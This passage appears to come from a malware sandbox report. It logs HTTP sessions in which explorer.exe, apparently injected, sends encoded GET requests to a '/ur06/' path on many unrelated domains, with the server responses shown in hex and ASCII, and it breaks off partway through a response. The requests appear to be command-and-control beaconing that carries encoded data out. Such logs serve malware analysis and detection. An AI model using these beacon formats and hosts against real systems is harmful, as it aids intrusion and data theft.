Jan 13, 2021 21:41:44.011373997 CET	5711	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:41:43 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc8396-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49782	52.116.52.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:41:49.177076101 CET	5711	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1 Host: www.bimetalthermostatksd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:41:49.335088968 CET	5712	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Jan 2021 20:41:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: https://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 X-Cache-CFC: - Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49783	104.18.45.60	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:41:54.395767927 CET	5713	OUT	GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.straightlineautoserviceerie.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:41:54.788088083 CET	5714	IN	HTTP/1.1 403 forbidden Date: Wed, 13 Jan 2021 20:41:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=dfd0fab4e196dd824a52ac4718c5a73f91610570514; expires=Fri, 12-Feb-21 20:41:54 GMT; path=/; domain=.straightlineautoserviceerie.net; HttpOnly; SameSite=Lax Vary: Accept-Encoding CF-Cache-Status: DYNAMIC cf-request-id: 079f14d8000000412b4009d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AsIo%2B%2BFqy3sjPwf5iLcgi8tRFsAvxWH2b7f4SMt2J3T0SahZ975EaXcTQbTZy4NHbLEAUCJ3iFG0vpMe80oK1QRSMPMDjDpTKXx4wEZEeephFgF1lx4Tivn2sC9vVD22GfrcWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6111f0d33ef1412b-PRG Data Raw: 64 0d 0a 34 30 33 20 46 4f 52 42 49 44 44 45 4e 0d 0a Data Ascii: d403 FORBIDDEN
Jan 13, 2021 21:41:54.788104057 CET	5714	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49784	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:41:59.841177940 CET	5714	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1 Host: www.cmoorestudio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:41:59.979943991 CET	5715	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:41:59 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc83a1-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49785	66.96.147.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:42:05.114039898 CET	5715	OUT	GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.eldritchparadox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:42:05.247495890 CET	5717	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:42:05 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49768	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:12.435581923 CET	5672	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1 Host: www.cmoorestudio.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:14.786267042 CET	5676	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:40:12 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc838f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49770	66.96.147.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:18.268443108 CET	5686	OUT	GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.eldritchparadox.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:18.403419018 CET	5688	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:40:18 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49771	107.180.50.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:28.708831072 CET	5689	OUT	GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.maconanimalexterminator.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:28.856754065 CET	5689	IN	HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:40:28 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49772	104.21.26.55	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:34.011687994 CET	5690	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1 Host: www.pelisplusxd.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:34.063383102 CET	5691	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Jan 2021 20:40:34 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Wed, 13 Jan 2021 21:40:34 GMT Location: https://www.pelisplusxd.net/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 cf-request-id: 079f139dfb00002b71a29e4000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bpzuCJErOfH6qrkEmOTenZXyviSOa0h53ZQ6dB%2BdpKMBsNzmn9gLOUIOXHBTJ9LNHlIRrdca%2F1ba5KuF17bSReDJe2LCcoTBGFcdlpFIC8xrBB1m"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6111eedcca7d2b71-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49773	5.181.218.55	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:39.319844007 CET	5697	OUT	GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.allismd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:40.836158037 CET	5701	IN	HTTP/1.1 301 Moved Permanently Connection: close X-Powered-By: PHP/7.2.34 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Type: text/html; charset=UTF-8 X-Redirect-By: WordPress Location: https://www.allismd.com/ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG X-Litespeed-Cache: miss Content-Length: 0 Date: Wed, 13 Jan 2021 20:40:40 GMT Server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49775	219.94.203.152	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:50.541443110 CET	5703	OUT	GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1 Host: www.central-car-sales.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:50.922324896 CET	5704	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Jan 2021 20:40:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://central-car-sales.com/ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49776	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 21:40:56.048911095 CET	5705	OUT	GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1 Host: www.nolarapper.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 21:40:56.187163115 CET	5705	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 20:40:56 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc8399-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" 